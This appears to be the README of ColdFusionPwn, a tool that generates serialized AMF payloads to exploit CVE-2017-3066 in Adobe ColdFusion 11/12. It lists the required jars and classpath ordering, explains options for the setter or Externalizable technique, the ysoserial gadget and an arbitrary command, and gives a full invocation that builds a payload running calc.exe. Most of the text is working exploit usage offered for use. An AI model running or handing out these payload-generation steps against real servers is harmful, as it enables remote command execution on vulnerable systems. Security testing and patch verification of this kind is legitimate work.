Exploitation Tool for CVE-2017-3066 targeting Adobe Coldfusion 11/12.
The tool allows you to generate serialized AMF-payloads to exploit the missing input validation of allowed classes. For details see our blog post.
Get the latest version of ysoserial. Get ColdFusionPwn from releases.
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner [-s|-e] [payload type] '[command]' [outfile]- [-s|-e] Setter (CF11) or Externalizable Exploit (CF11/12) technique
- [payload type] ysoserial gadget payload
- [command] command to be executed
- [outfile] output file for the generated payload
It's required to have ColdFusionPwn-0.0.1-SNAPSHOT-all.jar as first entry in the classpath, since the ApacheCommons BeanUtils library shipped with ysoserial is newer (and has a different serialversion uid).
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-master-SNAPSHOT.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 calc.exe /tmp/out.amf